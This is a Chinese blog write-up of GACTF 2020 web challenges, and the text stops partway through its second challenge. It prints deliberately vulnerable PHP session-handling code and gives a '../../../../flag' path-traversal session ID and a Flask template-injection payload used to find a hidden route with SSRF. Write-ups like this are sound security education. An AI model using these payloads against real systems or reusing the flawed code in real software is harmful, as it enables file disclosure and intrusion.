<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="babyshop 上来一个小商城，懵了一圈以后扫了一下目录，发现有git泄露。源码脱下来以后发现进行了混淆。 这个混淆有意思啊，所有的变量名甚至都是有意义的，难不成是出题人人 工 混 淆？ 简单浏览以后通过经验可以判断出，整个init.php大体分为两部分，造化之神用于混淆字符串常量，而造化函数则用于获取原字符串，是很常用的字符串常量混淆手段。再加上php的字符串可以作为函数调用，函数名也可以利用">
<meta property="og:type" content="article">
<meta property="og:title" content="GACTF 2020 Web 部分题目 Writeup">
<meta property="og:url" content="https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/index.html">
<meta property="og:site_name" content="Frank">
<meta property="og:description" content="babyshop 上来一个小商城，懵了一圈以后扫了一下目录，发现有git泄露。源码脱下来以后发现进行了混淆。 这个混淆有意思啊，所有的变量名甚至都是有意义的，难不成是出题人人 工 混 淆？ 简单浏览以后通过经验可以判断出，整个init.php大体分为两部分，造化之神用于混淆字符串常量，而造化函数则用于获取原字符串，是很常用的字符串常量混淆手段。再加上php的字符串可以作为函数调用，函数名也可以利用">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/upload_e92ae998edaadf1d01a758abe82e4d47.png">
<meta property="og:image" content="https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/upload_f4abe482d6ed5160ea58f93868f0cce4.png">
<meta property="article:published_time" content="2020-08-31T16:00:00.000Z">
<meta property="article:modified_time" content="2021-05-30T12:22:20.000Z">
<meta property="article:author" content="Frank Li">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Writeup">
<meta property="article:tag" content="XCTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/upload_e92ae998edaadf1d01a758abe82e4d47.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>GACTF 2020 Web 部分题目 Writeup</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
<!-- hexo injector head_end start -->
<style>
    .card {
        border-radius: 5px;
        border: 1px solid;
        border-color: #eee #ddd #bbb;
        box-shadow: rgba(0,0,0,.14) 0 1px 3px;
        text-align: center;  
        float: left;
        padding: 10px;
        margin: 10px;
    }
    .card .avatar {
        display: block;
        width: calc(100% - 20px);
        height: calc(100% - 20px);
        align-content: center;
        margin: auto
    }
    .card .title { white-space: nowrap; }
    @media screen and (max-width: 480px) {
        .card { width: calc(33% - 20px); }
    }
    @media screen and (max-width: 600px) and (min-width: 481px) {
        .card { width: calc(25% - 20px); }
    }
    @media screen and (min-width: 601px) {
        .card { width: calc(20% - 20px); }
    }
    .card-container { width: 90%; }
</style><!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.2"><link rel="alternate" href="/atom.xml" title="Frank" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="icons.menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="icons.menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "icons.top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇 " href="/2020/09/20/Dev/mssCTF%202020/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇 " href="/2020/08/21/Security/Writeup/CISCN%202020/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部 " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章 " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&text=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&is_video=false&description=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=GACTF 2020 Web 部分题目 Writeup&body=Check out this article: https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&title=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&name=GACTF 2020 Web 部分题目 Writeup&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://blog.frankli.site/2020/09/01/Security/Writeup/GACTF-2020-Web/&t=GACTF 2020 Web 部分题目 Writeup"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#babyshop"><span class="toc-number">1.</span> <span class="toc-text">babyshop</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%80%E7%AE%80%E5%8D%95%E7%9A%84%E8%A7%A3%E6%B3%95"><span class="toc-number">1.1.</span> <span class="toc-text">最简单的解法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%87%BA%E9%A2%98%E4%BA%BA%E5%8F%AF%E8%83%BD%E9%A2%84%E6%9C%9F%E7%9A%84%E8%A7%A3%E6%B3%95"><span class="toc-number">1.2.</span> <span class="toc-text">出题人可能预期的解法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EZFLASK"><span class="toc-number">2.</span> <span class="toc-text">EZFLASK</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#carefuleyes"><span class="toc-number">3.</span> <span class="toc-text">carefuleyes</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#simple-flask-%E4%B8%8E-XWiki"><span class="toc-number">4.</span> <span class="toc-text">simple flask 与 XWiki</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        GACTF 2020 Web 部分题目 Writeup
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Frank Li</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-08-31T16:00:00.000Z" itemprop="datePublished">2020-09-01</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/CTF/" rel="tag">CTF</a>, <a class="tag-link-link" href="/tags/Writeup/" rel="tag">Writeup</a>, <a class="tag-link-link" href="/tags/XCTF/" rel="tag">XCTF</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="babyshop">babyshop</h2>
<p>上来一个小商城，懵了一圈以后扫了一下目录，发现有git泄露。源码脱下来以后发现进行了混淆。<br>
这个混淆有意思啊，所有的变量名甚至都是有意义的，难不成是出题人人 工 混 淆？</p>
<p>简单浏览以后通过经验可以判断出，整个<code>init.php</code>大体分为两部分，<code>造化之神</code>用于混淆字符串常量，而<code>造化</code>函数则用于获取原字符串，是很常用的字符串常量混淆手段。再加上php的字符串可以作为函数调用，函数名也可以利用这种方式进行混淆。比如<code>造化(&quot;拢监纪浑诊余仍逃抹哀天夫&quot;)</code>实际上就是<code>stripos</code><br>
于是我们可以写一个简单的小脚本进行字符串恢复，抛弃<code>造化</code>部分。脚本由于没有复用价值，就不放在这了。<code>测</code>，<code>获</code>，<code>赋</code>等工具函数也可以通过简单的正则匹配进行替换。</p>
<p>最终我们可以恢复出混淆前的代码：</p>
<div class='spoiler collapsed'>
    <div class='spoiler-title'>
        题目源码
    </div>
    <div class='spoiler-content'>
        <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">ini_set(<span class="string">&#x27;display_errors&#x27;</span>, <span class="string">&#x27;Off&#x27;</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> 造齿轮</span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> $朝拜圣地;</span><br><span class="line">    <span class="keyword">protected</span> $贡品;</span><br><span class="line">    <span class="keyword">protected</span> $圣殿;</span><br><span class="line">    <span class="keyword">protected</span> $禁地;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;朝拜圣地 = <span class="string">&#x27;storage&#x27;</span>;</span><br><span class="line">        <span class="keyword">if</span> (!is_dir(<span class="keyword">$this</span>-&gt;朝拜圣地)) mkdir(<span class="keyword">$this</span>-&gt;朝拜圣地);</span><br><span class="line">        <span class="keyword">$this</span>-&gt;禁地 = <span class="keyword">array</span>(<span class="string">&#x27;php&#x27;</span>, <span class="string">&#x27;html&#x27;</span>, <span class="string">&#x27;htaccess&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 挖掘(<span class="params">$货物, $食物</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="keyword">$this</span>-&gt;禁地 <span class="keyword">as</span> $元素) &#123;</span><br><span class="line">            <span class="keyword">if</span> (stripos(<span class="variable">$_COOKIE</span>[$食物], $元素) !== <span class="literal">false</span>) &#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&#x27;invaild &#x27;</span> . $食物);</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;圣殿 = session_id();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 种植(<span class="params">$货物, $食物</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;贡品 = $货物;</span><br><span class="line">        <span class="keyword">return</span> file_put_contents(<span class="keyword">$this</span>-&gt;朝拜圣地 . <span class="string">&#x27;/sess_&#x27;</span> . $货物, $食物) === <span class="literal">false</span> ? <span class="literal">false</span> : <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 收获(<span class="params">$货物</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;贡品 = $货物;</span><br><span class="line">        <span class="keyword">return</span> (<span class="keyword">string</span>)@file_get_contents(<span class="keyword">$this</span>-&gt;朝拜圣地 . <span class="string">&#x27;/sess_&#x27;</span> . $货物);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 总结(<span class="params">$货物</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (strlen(<span class="keyword">$this</span>-&gt;圣殿) &lt;= <span class="number">0</span>) <span class="keyword">return</span>;</span><br><span class="line">        <span class="keyword">return</span> file_put_contents(<span class="keyword">$this</span>-&gt;朝拜圣地 . <span class="string">&#x27;/note_&#x27;</span> . <span class="keyword">$this</span>-&gt;圣殿, $货物) === <span class="literal">false</span> ? <span class="literal">false</span> : <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 归纳(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> (<span class="keyword">string</span>)@file_get_contents(<span class="keyword">$this</span>-&gt;朝拜圣地 . <span class="string">&#x27;/note_&#x27;</span> . <span class="keyword">$this</span>-&gt;贡品);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 思考(<span class="params">$货物</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;贡品 = $货物;</span><br><span class="line">        <span class="keyword">if</span> (file_exists(<span class="keyword">$this</span>-&gt;朝拜圣地 . <span class="string">&#x27;/sess_&#x27;</span> . $货物)) &#123;</span><br><span class="line">            unlink(<span class="keyword">$this</span>-&gt;朝拜圣地 . <span class="string">&#x27;/sess_&#x27;</span> . $货物);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 反省(<span class="params">$货物</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">foreach</span> (glob(<span class="keyword">$this</span>-&gt;朝拜圣地 . <span class="string">&#x27;/*&#x27;</span>) <span class="keyword">as</span> $元素) &#123;</span><br><span class="line">            <span class="keyword">if</span> (filemtime($元素) + $货物 &lt; time() &amp;&amp; file_exists($元素)) &#123;</span><br><span class="line">                unlink($元素);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> 完毕(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;总结(<span class="keyword">$this</span>-&gt;归纳());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$齿轮 = <span class="keyword">new</span> 造齿轮();</span><br><span class="line">session_set_save_handler(<span class="keyword">array</span>($齿轮, <span class="string">&#x27;挖掘&#x27;</span>), <span class="keyword">array</span>($齿轮, <span class="string">&#x27;完毕&#x27;</span>), <span class="keyword">array</span>($齿轮, <span class="string">&#x27;收获&#x27;</span>), <span class="keyword">array</span>($齿轮, <span class="string">&#x27;种植&#x27;</span>), <span class="keyword">array</span>($齿轮, <span class="string">&#x27;反省&#x27;</span>), <span class="keyword">array</span>($齿轮, <span class="string">&#x27;完毕&#x27;</span>));</span><br><span class="line">session_start();</span><br><span class="line">srand(mktime(<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>));</span><br><span class="line">$盛世 = <span class="keyword">array</span>(rand() =&gt; <span class="keyword">array</span>(<span class="string">&#x27;alice&#x27;</span>, <span class="number">1</span>), rand() =&gt; <span class="keyword">array</span>(<span class="string">&#x27;bob&#x27;</span>, <span class="number">5</span>), rand() =&gt; <span class="keyword">array</span>(<span class="string">&#x27;cat&#x27;</span>, <span class="number">20</span>), rand() =&gt; <span class="keyword">array</span>(<span class="string">&#x27;dog&#x27;</span>, <span class="number">15</span>), rand() =&gt; <span class="keyword">array</span>(<span class="string">&#x27;evil&#x27;</span>, <span class="number">5</span>), rand() =&gt; <span class="keyword">array</span>(<span class="string">&#x27;flag&#x27;</span>, <span class="number">9999</span>));</span><br><span class="line"><span class="function"><span class="keyword">function</span> 化缘(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$_SESSION</span>[<span class="string">&#x27;balance&#x27;</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> 取经(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $盛世;</span><br><span class="line">    $宝藏 = <span class="string">&#x27;[&#x27;</span>;</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$_SESSION</span>[<span class="string">&#x27;items&#x27;</span>] <span class="keyword">as</span> $元素) $宝藏 .= $盛世[$元素][<span class="number">0</span>] . <span class="string">&#x27;, &#x27;</span>;</span><br><span class="line">    $宝藏 .= <span class="string">&#x27;]&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> $宝藏;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> 念经(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $齿轮;</span><br><span class="line">    <span class="keyword">return</span> $齿轮-&gt;归纳();</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> 造世(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">global</span> $盛世;</span><br><span class="line">    $宝藏 = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="keyword">foreach</span> ($盛世 <span class="keyword">as</span> $按键 =&gt; $元素) $宝藏 .= <span class="string">&#x27;&lt;div class=&quot;item&quot;&gt;&lt;form method=&quot;POST&quot;&gt;&lt;div class=&quot;form-group&quot;&gt;&#x27;</span> . $元素[<span class="number">0</span>] . <span class="string">&#x27;&lt;/div&gt;&lt;div class=&quot;form-group&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;&#x27;</span> . $按键 . <span class="string">&#x27;&quot;&gt;&lt;button type=&quot;submit&quot; class=&quot;btn btn-success&quot;&gt;buy ($&#x27;</span> . $元素[<span class="number">1</span>] . <span class="string">&#x27;)&lt;/button&gt;&lt;/div&gt;&lt;/form&gt;&lt;/div&gt;&#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> $宝藏;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;balance&#x27;</span>])) <span class="variable">$_SESSION</span>[<span class="string">&#x27;balance&#x27;</span>] = <span class="number">2233</span>;</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;items&#x27;</span>])) <span class="variable">$_SESSION</span>[<span class="string">&#x27;items&#x27;</span>] = [];</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;note&#x27;</span>])) <span class="variable">$_SESSION</span>[<span class="string">&#x27;note&#x27;</span>] = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$_SESSION</span>[<span class="string">&#x27;balance&#x27;</span>] &gt;= $盛世[<span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>]][<span class="number">1</span>]) &#123;</span><br><span class="line">        <span class="variable">$_SESSION</span>[<span class="string">&#x27;balance&#x27;</span>] = <span class="variable">$_SESSION</span>[<span class="string">&#x27;balance&#x27;</span>] - $盛世[<span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>]][<span class="number">1</span>];</span><br><span class="line">        array_push($&#123;<span class="string">&#x27;_SESSION&#x27;</span>&#125;[<span class="string">&#x27;items&#x27;</span>], <span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>]);</span><br><span class="line">        <span class="keyword">echo</span> (<span class="string">&#x27;&lt;span style=&quot;color:green&quot;&gt;buy succ!&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> (<span class="string">&#x27;&lt;span style=&quot;color:red&quot;&gt;lack of balance!&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;note&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (strlen(<span class="variable">$_POST</span>[<span class="string">&#x27;note&#x27;</span>]) &lt;= <span class="number">1</span> &lt;&lt; <span class="number">10</span>) &#123;</span><br><span class="line">        $齿轮-&gt;总结(str_replace(<span class="keyword">array</span>(<span class="string">&#x27;&amp;&#x27;</span>, <span class="string">&#x27;&lt;&#x27;</span>, <span class="string">&#x27;&gt;&#x27;</span>), <span class="keyword">array</span>(<span class="string">&#x27;&amp;amp;&#x27;</span>, <span class="string">&#x27;&amp;lt;&#x27;</span>, <span class="string">&#x27;&amp;gt;&#x27;</span>), <span class="variable">$_POST</span>[<span class="string">&#x27;note&#x27;</span>]));</span><br><span class="line">        <span class="keyword">echo</span> (<span class="string">&#x27;&lt;span style=&quot;color:green&quot;&gt;write succ!&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> (<span class="string">&#x27;&lt;span style=&quot;color:red&quot;&gt;note too long!&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

    </div>
</div>
<p>阅读源码我们可以看出，出题人自行注册了session数据存储机制，将session数据存储在了web目录下，文件名后半部分可控。<br>
参考php <code>session_set_save_handler</code>函数手册，结合源码，我们可以发现源码对sessionid进行了简单过滤。</p>
<p>如何解这道题呢？</p>
<h3 id="最简单的解法">最简单的解法</h3>
<p>首先我们可以看到Accounts页面中回显了<code>note_</code>文件的内容，我们能够控制这个文件的路径，而这里存在目录穿越<br>
所以我们把sessionid设置成<code>../../../../flag</code>就行了。flag文件我们没权限写，读权限还是有的。我们是这么做出来的（（</p>
<h3 id="出题人可能预期的解法">出题人可能预期的解法</h3>
<p>虽然题已经做出来了，但是后面貌似出题人将flag加入了关键词检测。看一看源码，有两个有趣的地方</p>
<ul>
<li><code>srand(固定值)</code></li>
<li>session处理的逻辑写在了一个类里面，有<code>__destruct</code>，且反序列化可以绕过对sessionid的waf</li>
</ul>
<p>具体怎么做还没来得及研究，之后有空了再说吧</p>
<h2 id="EZFLASK">EZFLASK</h2>
<p>出题人给出了部分源码，明摆着就是想让我们去访问admin路由。<br>
<a target="_blank" rel="noopener" href="https://docs.python.org/3/reference/datamodel.html?highlight=__globals__">__globals__到底是什么</a></p>
<p><code>&#123;&#123;index.__globals__&#125;&#125;</code></p>
<img src="/2020/09/01/Security/Writeup/GACTF-2020-Web/upload_e92ae998edaadf1d01a758abe82e4d47.png" class="" title="aaa">
<p>于是我们可以看出admin路由为<code>/h4rdt0f1nd_9792uagcaca00qjaf</code>，访问后发现是一个requests的ssrf点。<br>
还有一个ctf函数我们还没有用过，看出题人的意思是那里有一些提示。通过<a target="_blank" rel="noopener" href="https://docs.python.org/3/reference/datamodel.html?highlight=__code__">__code__属性</a>我们可以一窥ctf函数中的常量：</p>
